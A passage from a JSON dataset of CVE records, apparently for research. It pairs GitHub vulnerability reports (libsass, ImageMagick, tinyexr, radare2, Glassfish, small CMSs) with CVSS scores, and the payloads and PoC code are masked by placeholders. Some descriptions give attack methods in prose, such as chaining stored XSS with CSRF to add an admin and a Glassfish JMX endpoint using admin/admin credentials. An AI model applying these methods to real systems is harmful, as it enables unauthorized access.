  88461. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  88462. "severity": "HIGH",
  88463. "baseScore": 8.8,
  88464. "impactScore": 5.9,
  88465. "exploitabilityScore": 2.8
  88466. },
  88467. {
  88468. "CVE_ID": "CVE-2018-11499",
  88469. "Issue_Url_old": "https://github.com/sass/libsass/issues/2643",
  88470. "Issue_Url_new": "https://github.com/sass/libsass/issues/2643",
  88471. "Repo_new": "sass/libsass",
  88472. "Issue_Created_At": "2018-05-02T00:22:46Z",
  88473. "description": "APITAG heap use after free in libsass. Hey there, I have discovered a use after free vulnerability in libsass. Found when fuzzing commit APITAG of libsass, using commit aa6d5c6 URLTAG of sassc as a harness. After testing all releases, it is evident this was introduced in release NUMBERTAG of libsass. Compile flags to reproduce: APITAG You can find the case file FILETAG . ASAN report is as follows: ERRORTAG",
  88474. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  88475. "severity": "CRITICAL",
  88476. "baseScore": 9.8,
  88477. "impactScore": 5.9,
  88478. "exploitabilityScore": 3.9
  88479. },
  88480. {
  88481. "CVE_ID": "CVE-2018-11512",
  88482. "Issue_Url_old": "https://github.com/Creatiwity/wityCMS/issues/150",
  88483. "Issue_Url_new": "https://github.com/creatiwity/witycms/issues/150",
  88484. "Repo_new": "creatiwity/witycms",
  88485. "Issue_Created_At": "2018-05-27T05:25:29Z",
  88486. "description": "Persistent XSS on APITAG name' field (site_title). Hi guys, wonderful work on the CMS! I found a security issue on the website's name in the admin settings: Stored cross site scripting (XSS) vulnerability in the APITAG name\" field found in the APITAG page under the APITAG menu in APITAG NUMBERTAG allows remote attackers to inject arbitrary web script or HTML via a crafted website name by doing an authenticated POST HTTP request to PATHTAG This vulnerability is specifically the APITAG name\" field. I noticed that it does strip off the tags APITAG and APITAG however, it isn't recursive. By entering this payload: APITAG Javascript gets executed. Here's an output of the mentioned payload when entered and saved. FILETAG The payload gets saved in the file: PATHTAG as a raw Javascript code: FILETAG When an unauthenticated user visits the page, the code gets executed: FILETAG If the data is not sanitized upon input, these components are going to return arbitrary web script or HTML that can be rendered by the browser because it retrieves the script, hence, the possible APITAG Components\" are as follow: Potentially all scripts using: PATHTAG Potentially all scripts using: PATHTAG PATHTAG PATHTAG PATHTAG There may be more but I believe this can be fixed by recursively stripping out the tags APITAG and APITAG",
  88487. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  88488. "severity": "MEDIUM",
  88489. "baseScore": 4.8,
  88490. "impactScore": 2.7,
  88491. "exploitabilityScore": 1.7
  88492. },
  88493. {
  88494. "CVE_ID": "CVE-2018-11531",
  88495. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/283",
  88496. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/283",
  88497. "Repo_new": "exiv2/exiv2",
  88498. "Issue_Created_At": "2018-04-22T13:18:05Z",
  88499. "description": "heap buffer overflow in APITAG ERRORTAG Reproducer: FILETAG SHA1: APITAG Tools: afl NUMBERTAG b, afl utils",
  88500. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  88501. "severity": "CRITICAL",
  88502. "baseScore": 9.8,
  88503. "impactScore": 5.9,
  88504. "exploitabilityScore": 3.9
  88505. },
  88506. {
  88507. "CVE_ID": "CVE-2018-11558",
  88508. "Issue_Url_old": "https://github.com/domainmod/domainmod/issues/66",
  88509. "Issue_Url_new": "https://github.com/domainmod/domainmod/issues/66",
  88510. "Repo_new": "domainmod/domainmod",
  88511. "Issue_Created_At": "2018-05-29T14:29:58Z",
  88512. "description": "There are two Stored XSS vulnerabilities. A read only user can combine the Stored XSS with CSRF to add an administrator account, change the read only user to admin, or change the admin password\u2026\u2026 poc: after the read only user logs in, post to url APITAG with post data: APITAG then when the admin logs in and opens the url URLTAG the javascript will execute. With the CSRF vulnerability( URLTAG , a read only user can add an administrator account, change the read only user to admin, or change the admin password\u2026\u2026",
  88513. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  88514. "severity": "MEDIUM",
  88515. "baseScore": 5.4,
  88516. "impactScore": 2.7,
  88517. "exploitabilityScore": 2.3
  88518. },
  88519. {
  88520. "CVE_ID": "CVE-2018-11624",
  88521. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1149",
  88522. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1149",
  88523. "Repo_new": "imagemagick/imagemagick",
  88524. "Issue_Created_At": "2018-05-29T08:23:54Z",
  88525. "description": "heap use after free. Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description Version: APITAG NUMBERTAG Q NUMBERTAG Steps to Reproduce ERRORTAG POC FILETAG System Configuration APITAG version NUMBERTAG Q NUMBERTAG Environment APITAG system, version and so on):ubuntu NUMBERTAG Additional information: Found by: Wang Zongming",
  88526. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  88527. "severity": "HIGH",
  88528. "baseScore": 8.8,
  88529. "impactScore": 5.9,
  88530. "exploitabilityScore": 2.8
  88531. },
  88532. {
  88533. "CVE_ID": "CVE-2018-11626",
  88534. "Issue_Url_old": "https://github.com/sahaRatul/sela/issues/12",
  88535. "Issue_Url_new": "https://github.com/saharatul/sela/issues/12",
  88536. "Repo_new": "saharatul/sela",
  88537. "Issue_Created_At": "2018-05-29T09:24:38Z",
  88538. "description": "stack buffer overflow in variable keys_inst. Hello, I used my company's tools to fuzz test sela. I first found the APITAG and want to show the error information to you.",
  88539. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  88540. "severity": "HIGH",
  88541. "baseScore": 7.5,
  88542. "impactScore": 3.6,
  88543. "exploitabilityScore": 3.9
  88544. },
  88545. {
  88546. "CVE_ID": "CVE-2018-11694",
  88547. "Issue_Url_old": "https://github.com/sass/libsass/issues/2663",
  88548. "Issue_Url_new": "https://github.com/sass/libsass/issues/2663",
  88549. "Repo_new": "sass/libsass",
  88550. "Issue_Created_At": "2018-06-03T02:24:31Z",
  88551. "description": "APITAG null pointer dereference (SEGV) in APITAG ( PATHTAG ). Hey there, I have discovered a null pointer dereference in libsass at: APITAG URLTAG Found when fuzzing commit APITAG of libsass, using commit aa6d5c6 URLTAG of sassc as a harness. Compile flags to reproduce: APITAG System information: ERRORTAG This bug was found to be in libsass releases from FILETAG until the commit listed above. You can find a collection of APITAG files that trigger the bug FILETAG . The full ASAN report is shown below: ERRORTAG",
  88552. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  88553. "severity": "HIGH",
  88554. "baseScore": 8.8,
  88555. "impactScore": 5.9,
  88556. "exploitabilityScore": 2.8
  88557. },
  88558. {
  88559. "CVE_ID": "CVE-2018-12052",
  88560. "Issue_Url_old": "https://github.com/unh3x/just4cve/issues/3",
  88561. "Issue_Url_new": "https://github.com/unh3x/just4cve/issues/3",
  88562. "Repo_new": "unh3x/just4cve",
  88563. "Issue_Created_At": "2018-06-07T01:42:54Z",
  88564. "description": "FILETAG",
  88565. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  88566. "severity": "CRITICAL",
  88567. "baseScore": 9.8,
  88568. "impactScore": 5.9,
  88569. "exploitabilityScore": 3.9
  88570. },
  88571. {
  88572. "CVE_ID": "CVE-2018-12503",
  88573. "Issue_Url_old": "https://github.com/syoyo/tinyexr/issues/81",
  88574. "Issue_Url_new": "https://github.com/syoyo/tinyexr/issues/81",
  88575. "Repo_new": "syoyo/tinyexr",
  88576. "Issue_Created_At": "2018-06-16T11:25:40Z",
  88577. "description": "Heap buffer overflow in APITAG I build tinyexr with clang and address sanitizer. When testcase (see: URLTAG is input into test_tinyexr (command: ./test_tinyexr testcase), a heap buffer overflow has triggered NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG e0 at pc NUMBERTAG c NUMBERTAG bp NUMBERTAG ffe NUMBERTAG d NUMBERTAG sp NUMBERTAG ffe NUMBERTAG d NUMBERTAG READ of size NUMBERTAG at NUMBERTAG e0 thread T NUMBERTAG c NUMBERTAG in APITAG PATHTAG NUMBERTAG b NUMBERTAG in APITAG PATHTAG NUMBERTAG f in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f5e NUMBERTAG e9e NUMBERTAG f in __libc_start_main PATHTAG NUMBERTAG b3e8 in _start ( PATHTAG NUMBERTAG e0 is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG a8 in operator new(unsigned long) PATHTAG NUMBERTAG b3f4 in APITAG char>::allocate(unsigned long, void const ) PATHTAG NUMBERTAG b3f4 in APITAG char> APITAG char>&, unsigned long) PATHTAG NUMBERTAG b3f4 in APITAG char, std::allocator<unsigned char> >::_M_allocate(unsigned long) PATHTAG NUMBERTAG b3f4 in APITAG char, std::allocator<unsigned char> >::_M_create_storage(unsigned long) PATHTAG NUMBERTAG b3f4 in APITAG char, std::allocator<unsigned char> APITAG long, std::allocator<unsigned char> const&) PATHTAG NUMBERTAG b3f4 in std::vector<unsigned char, std::allocator<unsigned char> >::vector(unsigned long, std::allocator<unsigned char> const&) PATHTAG NUMBERTAG b3f4 in APITAG PATHTAG NUMBERTAG f in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f5e NUMBERTAG e9e NUMBERTAG f in __libc_start_main PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG in APITAG Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG c NUMBERTAG fff NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG c NUMBERTAG fff NUMBERTAG c NUMBERTAG fff NUMBERTAG fa]fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING",
  88578. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  88579. "severity": "CRITICAL",
  88580. "baseScore": 9.8,
  88581. "impactScore": 5.9,
  88582. "exploitabilityScore": 3.9
  88583. },
  88584. {
  88585. "CVE_ID": "CVE-2018-12504",
  88586. "Issue_Url_old": "https://github.com/syoyo/tinyexr/issues/82",
  88587. "Issue_Url_new": "https://github.com/syoyo/tinyexr/issues/82",
  88588. "Repo_new": "syoyo/tinyexr",
  88589. "Issue_Created_At": "2018-06-16T11:26:12Z",
  88590. "description": "Assertion failure. When the testcase (see: URLTAG) is input into test_tinyexr (command: ./test_tinyexr testcase), an assertion failure is triggered in APITAG test_tinyexr: . APITAG void APITAG , int , size_t , int, const APITAG ): Assertion NUMBERTAG failed. Aborted",
  88591. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  88592. "severity": "HIGH",
  88593. "baseScore": 7.5,
  88594. "impactScore": 3.6,
  88595. "exploitabilityScore": 3.9
  88596. },
  88597. {
  88598. "CVE_ID": "CVE-2018-12600",
  88599. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1178",
  88600. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1178",
  88601. "Repo_new": "imagemagick/imagemagick",
  88602. "Issue_Created_At": "2018-06-19T13:48:40Z",
  88603. "description": "out of bounds write in dib.c. Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description CODETAG Similar to URLTAG the APITAG in coders/dib.c may cause an out of bounds write bug Steps to Reproduce In coders/dib.c ERRORTAG (image >rows y NUMBERTAG bytes_per_line may be much larger than APITAG will cause an out of bounds write bug in line NUMBERTAG of coders/dib.c To reproduce this problem: ERRORTAG Debugging information\uff1a ERRORTAG POC FILETAG System Configuration APITAG APITAG NUMBERTAG Q NUMBERTAG Environment APITAG system, version and so on):ubuntu NUMBERTAG Additional information: Credit: Zongming Wang from Chengdu Security Response Center of Qihoo NUMBERTAG Technology Co. Ltd.",
  88604. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  88605. "severity": "HIGH",
  88606. "baseScore": 8.8,
  88607. "impactScore": 5.9,
  88608. "exploitabilityScore": 2.8
  88609. },
  88610. {
  88611. "CVE_ID": "CVE-2018-12654",
  88612. "Issue_Url_old": "https://github.com/slims/slims8_akasia/issues/98",
  88613. "Issue_Url_new": "https://github.com/slims/slims8_akasia/issues/98",
  88614. "Repo_new": "slims/slims8_akasia",
  88615. "Issue_Created_At": "2018-06-21T03:22:13Z",
  88616. "description": "FILETAG FILETAG",
  88617. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  88618. "severity": "MEDIUM",
  88619. "baseScore": 6.1,
  88620. "impactScore": 2.7,
  88621. "exploitabilityScore": 2.8
  88622. },
  88623. {
  88624. "CVE_ID": "CVE-2018-12680",
  88625. "Issue_Url_old": "https://github.com/Tanganelli/CoAPthon/issues/135",
  88626. "Issue_Url_new": "https://github.com/tanganelli/coapthon/issues/135",
  88627. "Repo_new": "tanganelli/coapthon",
  88628. "Issue_Created_At": "2018-12-27T14:24:00Z",
  88629. "description": "Denial of Service vulnerability caused by improper exception handling while parsing APITAG messages. Multiple sample applications from the APITAG library are vulnerable to Denial of Service attacks caused by maliciously crafted APITAG messages. Method APITAG improperly handles multiple exception types, leading to a crash of the applications (including the standard APITAG server, APITAG client, APITAG reverse proxy, and the example collect APITAG server and client). Example payloads and unhandled exceptions NUMBERTAG File: ERRORTAG (attached) Error message: File PATHTAG line NUMBERTAG in convert_to_raw return bytearray(value, \"utf NUMBERTAG ERRORTAG 'ascii' codec can't decode byte NUMBERTAG b9 in position NUMBERTAG ordinal not in range NUMBERTAG File: ERRORTAG Error message: File PATHTAG line NUMBERTAG in add_option raise ERRORTAG : %s is not repeatable\", APITAG ERRORTAG APITAG : %s is not repeatable', 'If None Match NUMBERTAG File: ERRORTAG Error message: File PATHTAG line NUMBERTAG in APITAG length = s.unpack_from(values FILETAG The issue was reported via email on the NUMBERTAG rd of February NUMBERTAG to the APITAG developers and registered in the CVE database (reserved id is: CVETAG ).",
  88630. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  88631. "severity": "HIGH",
  88632. "baseScore": 7.5,
  88633. "impactScore": 3.6,
  88634. "exploitabilityScore": 3.9
  88635. },
  88636. {
  88637. "CVE_ID": "CVE-2018-12913",
  88638. "Issue_Url_old": "https://github.com/richgel999/miniz/issues/90",
  88639. "Issue_Url_new": "https://github.com/richgel999/miniz/issues/90",
  88640. "Repo_new": "richgel999/miniz",
  88641. "Issue_Created_At": "2018-06-27T09:25:59Z",
  88642. "description": "miniz_tinfl.c NUMBERTAG has an infinite loop. In miniz_tinfl.c NUMBERTAG there is an infinite loop: sym2 and counter always equal NUMBERTAG. I used example3 to test the PoC: FILETAG",
  88643. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  88644. "severity": "HIGH",
  88645. "baseScore": 7.5,
  88646. "impactScore": 3.6,
  88647. "exploitabilityScore": 3.9
  88648. },
  88649. {
  88650. "CVE_ID": "CVE-2018-12971",
  88651. "Issue_Url_old": "https://github.com/teameasy/EasyCMS/issues/3",
  88652. "Issue_Url_new": "https://github.com/teameasy/easycms/issues/3",
  88653. "Repo_new": "teameasy/easycms",
  88654. "Issue_Created_At": "2018-06-28T11:25:28Z",
  88655. "description": "There is a CSRF vulnerability which can delete user accounts. First I added NUMBERTAG user accounts with IDs NUMBERTAG FILETAG These accounts can be deleted by getting a logged-in victim to submit this HTML form. CODETAG FILETAG FILETAG The user accounts were then deleted. FILETAG",
  88656. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  88657. "severity": "MEDIUM",
  88658. "baseScore": 6.5,
  88659. "impactScore": 3.6,
  88660. "exploitabilityScore": 2.8
  88661. },
  88662. {
  88663. "CVE_ID": "CVE-2018-13003",
  88664. "Issue_Url_old": "https://github.com/OpenTSDB/opentsdb/issues/1241",
  88665. "Issue_Url_new": "https://github.com/opentsdb/opentsdb/issues/1241",
  88666. "Repo_new": "opentsdb/opentsdb",
  88667. "Issue_Created_At": "2018-06-29T03:24:39Z",
  88668. "description": "Vul.",
  88669. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  88670. "severity": "MEDIUM",
  88671. "baseScore": 6.1,
  88672. "impactScore": 2.7,
  88673. "exploitabilityScore": 2.8
  88674. },
  88675. {
  88676. "CVE_ID": "CVE-2018-13419",
  88677. "Issue_Url_old": "https://github.com/erikd/libsndfile/issues/398",
  88678. "Issue_Url_new": "https://github.com/libsndfile/libsndfile/issues/398",
  88679. "Repo_new": "libsndfile/libsndfile",
  88680. "Issue_Created_At": "2018-07-05T10:23:37Z",
  88681. "description": "memory leaks detected. APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG ffff6f NUMBERTAG a in __interceptor_calloc ( PATHTAG NUMBERTAG ffff6b3deb7 in psf_allocate APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG ffff6f NUMBERTAG in realloc ( PATHTAG NUMBERTAG ffff6b4fb NUMBERTAG in psf_bump_header_allocation APITAG NUMBERTAG ffff6b4fb NUMBERTAG in header_seek APITAG NUMBERTAG ffff6b4fb NUMBERTAG in psf_binheader_readf APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG ffff6f NUMBERTAG a in __interceptor_calloc ( PATHTAG NUMBERTAG ffff6bfe0a0 in psf_store_read_chunk APITAG NUMBERTAG ffff6bfe0a0 in psf_store_read_chunk_u NUMBERTAG APITAG NUMBERTAG ffff6c NUMBERTAG PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG ffff6f NUMBERTAG a in __interceptor_calloc ( PATHTAG NUMBERTAG ffff6aaed7f in wav_open APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG ffff6f NUMBERTAG in realloc ( PATHTAG NUMBERTAG ffff6be NUMBERTAG in psf_store_string APITAG The command line is ./sndfile convert NUMBERTAG wav ./out.prc where NUMBERTAG wav is just a simple wav file.",
  88682. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  88683. "severity": "MEDIUM",
  88684. "baseScore": 6.5,
  88685. "impactScore": 3.6,
  88686. "exploitabilityScore": 2.8
  88687. },
  88688. {
  88689. "CVE_ID": "CVE-2018-13420",
  88690. "Issue_Url_old": "https://github.com/gperftools/gperftools/issues/1013",
  88691. "Issue_Url_new": "https://github.com/gperftools/gperftools/issues/1013",
  88692. "Repo_new": "gperftools/gperftools",
  88693. "Issue_Created_At": "2018-07-06T07:26:30Z",
  88694. "description": "Memory leaks detected . When run program sampler_test, a memory leak has been found ERRORTAG",
  88695. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  88696. "severity": "HIGH",
  88697. "baseScore": 7.5,
  88698. "impactScore": 3.6,
  88699. "exploitabilityScore": 3.9
  88700. },
  88701. {
  88702. "CVE_ID": "CVE-2018-13848",
  88703. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/285",
  88704. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/285",
  88705. "Repo_new": "axiomatic-systems/bento4",
  88706. "Issue_Created_At": "2018-07-10T02:27:46Z",
  88707. "description": "A SEGV signal occurred when running mp4compact. A SEGV signal occurred when running mp4compact at APITAG ERRORTAG The testing program is mp4compact. And the input file has been put at: URLTAG",
  88708. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  88709. "severity": "HIGH",
  88710. "baseScore": 7.5,
  88711. "impactScore": 3.6,
  88712. "exploitabilityScore": 3.9
  88713. },
  88714. {
  88715. "CVE_ID": "CVE-2018-14015",
  88716. "Issue_Url_old": "https://github.com/radare/radare2/issues/10465",
  88717. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/10465",
  88718. "Repo_new": "radareorg/radare2",
  88719. "Issue_Created_At": "2018-06-24T12:26:03Z",
  88720. "description": "null pointer error at APITAG Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | ELF. | Architecture/bits of the file (mandatory NUMBERTAG r2 v full output, not truncated (mandatory) | radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g NUMBERTAG c NUMBERTAG a8 commit NUMBERTAG c NUMBERTAG build NUMBERTAG Expected behavior r2 should analyze a elf binary quickly Actual behavior r2 leads to the null pointer error Steps to reproduce the behavior Download FILETAG run r2 A Q $POC The Address Sanitizer output APITAG ERRORTAG",
  88721. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  88722. "severity": "MEDIUM",
  88723. "baseScore": 5.5,
  88724. "impactScore": 3.6,
  88725. "exploitabilityScore": 1.8
  88726. },
  88727. {
  88728. "CVE_ID": "CVE-2018-14017",
  88729. "Issue_Url_old": "https://github.com/radare/radare2/issues/10498",
  88730. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/10498",
  88731. "Repo_new": "radareorg/radare2",
  88732. "Issue_Created_At": "2018-06-26T02:43:50Z",
  88733. "description": "APITAG heap buffer overflow at APITAG | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | Java Class | Architecture/bits of the file (mandatory NUMBERTAG r2 v full output, not truncated (mandatory) | radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g NUMBERTAG c NUMBERTAG a8 commit NUMBERTAG c NUMBERTAG build NUMBERTAG Expected behavior r2 should analyze a java class binary quickly Actual behavior r2 leads to the heap buffer overflow Steps to reproduce the behavior Download POC URLTAG run r2 A Q $POC The Address Sanitizer output APITAG ERRORTAG",
  88734. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  88735. "severity": "MEDIUM",
  88736. "baseScore": 5.5,
  88737. "impactScore": 3.6,
  88738. "exploitabilityScore": 1.8
  88739. },
  88740. {
  88741. "CVE_ID": "CVE-2018-14052",
  88742. "Issue_Url_old": "https://github.com/marc-q/libwav/issues/19",
  88743. "Issue_Url_new": "https://github.com/marc-q/libwav/issues/19",
  88744. "Repo_new": "marc-q/libwav",
  88745. "Issue_Created_At": "2018-07-12T11:25:43Z",
  88746. "description": "SEGV in function apply_gain in wav_gain.c. I use Clang NUMBERTAG and APITAG to build libwav , this file URLTAG can cause SEGV signal in function APITAG when running the APITAG in folder APITAG with the following command: APITAG This is the ASAN information: ERRORTAG",
  88747. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  88748. "severity": "MEDIUM",
  88749. "baseScore": 6.5,
  88750. "impactScore": 3.6,
  88751. "exploitabilityScore": 2.8
  88752. },
  88753. {
  88754. "CVE_ID": "CVE-2018-14324",
  88755. "Issue_Url_old": "https://github.com/eclipse-ee4j/glassfish/issues/22500",
  88756. "Issue_Url_new": "https://github.com/eclipse-ee4j/glassfish/issues/22500",
  88757. "Repo_new": "eclipse-ee4j/glassfish",
  88758. "Issue_Created_At": "2018-04-20T01:50:23Z",
  88759. "description": "Glassfish jmx_rmi remote monitoring and control problem. Glassfish jmx_rmi remote monitoring and control problem Environment Details APITAG Version (and build number NUMBERTAG JDK version NUMBERTAG OS: win7 Problem Description The demo is open by default. APITAG opens the NUMBERTAG port by default, and it can be accessed remotely. Discovered JMX URL: PATHTAG The JMX endpoint uses a weak default password: admin/admin. Meanwhile, see FILETAG for more information. Then click the corresponding function. amx support > operation > APITAG An amx directory appears. In amx, functions such as deleting the demo, stopping, closing, creating, and database operations can be performed remotely. There is also a lot of server information here. Here is a simple Java sample for remote access to information through Glassfish JMX. ERRORTAG Impact of Issue This was originally a remote performance-monitoring JMX interface; it should not become an entry point for attackers. I hope you can turn it off by default. It is genuinely harmful, since the server can be remotely manipulated through it. Thank you very much. Sorry to disturb you \uff01",
  88760. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  88761. "severity": "CRITICAL",
  88762. "baseScore": 9.8,
  88763. "impactScore": 5.9,
  88764. "exploitabilityScore": 3.9
  88765. },
  88766. {
  88767. "CVE_ID": "CVE-2018-14382",
  88768. "Issue_Url_old": "https://github.com/instantsoft/icms2/issues/892",
  88769. "Issue_Url_new": "https://github.com/instantsoft/icms2/issues/892",
  88770. "Repo_new": "instantsoft/icms2",
  88771. "Issue_Created_At": "2018-07-17T05:26:28Z",
  88772. "description": "Reflected XSS in redirect url. Hello, I have found a reflected XSS in the url parameter. XSS POC: URLTAG FILETAG Discovered by zhihua. EMAILTAG .cn(hackyzh)",
  88773. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  88774. "severity": "MEDIUM",
  88775. "baseScore": 6.1,
  88776. "impactScore": 2.7,
  88777. "exploitabilityScore": 2.8
  88778. },
  88779. {
  88780. "CVE_ID": "CVE-2018-14423",
  88781. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/1123",
  88782. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/1123",
  88783. "Repo_new": "uclouvain/openjpeg",
  88784. "Issue_Created_At": "2018-07-17T02:27:04Z",
  88785. "description": "Division by zero vulnerabilities in the function pi_next_pcrl, pi_next_cprl and pi_next_rpcl in PATHTAG Function pi_next_pcrl, pi_next_cprl and pi_next_rpcl have the division by zero vulnerabilities in PATHTAG CODETAG CODETAG CODETAG This issue is same with NUMBERTAG And the patch should be like the patch for NUMBERTAG and so on. APITAG patch for NUMBERTAG ERRORTAG",
  88786. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  88787. "severity": "HIGH",
  88788. "baseScore": 7.5,
  88789. "impactScore": 3.6,
  88790. "exploitabilityScore": 3.9
  88791. },
  88792. {
  88793. "CVE_ID": "CVE-2018-14434",
  88794. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1192",
  88795. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1192",
  88796. "Repo_new": "imagemagick/imagemagick",
  88797. "Issue_Created_At": "2018-07-04T03:28:11Z",
  88798. "description": "coders/mpc.c colormap potential memory leak bug. Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description A potential memory leak bug is located in coders/miff.c Steps to Reproduce The bug is located at URLTAG the code fragment is as follows: the code is inside an if block, and colormap memory is allocated in that if block; it is freed on the normal path, but freeing it is forgotten on the exception (error) path ERRORTAG credit: APITAG ( \u58a8\u4e91\u79d1\u6280) System Configuration APITAG",
  88799. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  88800. "severity": "MEDIUM",
  88801. "baseScore": 6.5,
  88802. "impactScore": 3.6,
  88803. "exploitabilityScore": 2.8
  88804. },
  88805. {
  88806. "CVE_ID": "CVE-2018-14521",
  88807. "Issue_Url_old": "https://github.com/aubio/aubio/issues/187",
  88808. "Issue_Url_new": "https://github.com/aubio/aubio/issues/187",
  88809. "Repo_new": "aubio/aubio",
  88810. "Issue_Created_At": "2018-07-22T11:29:08Z",
  88811. "description": "SEGV signal found when running aubiomfcc. I was running aubiomfcc with a wav file as an input and I got a crash . The address sanitizer reported as: ERRORTAG The input file I give to the program is displayed at: URLTAG The command line is just ./aubiomfcc i testcase1",
  88812. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  88813. "severity": "HIGH",
  88814. "baseScore": 8.8,
  88815. "impactScore": 5.9,
  88816. "exploitabilityScore": 2.8
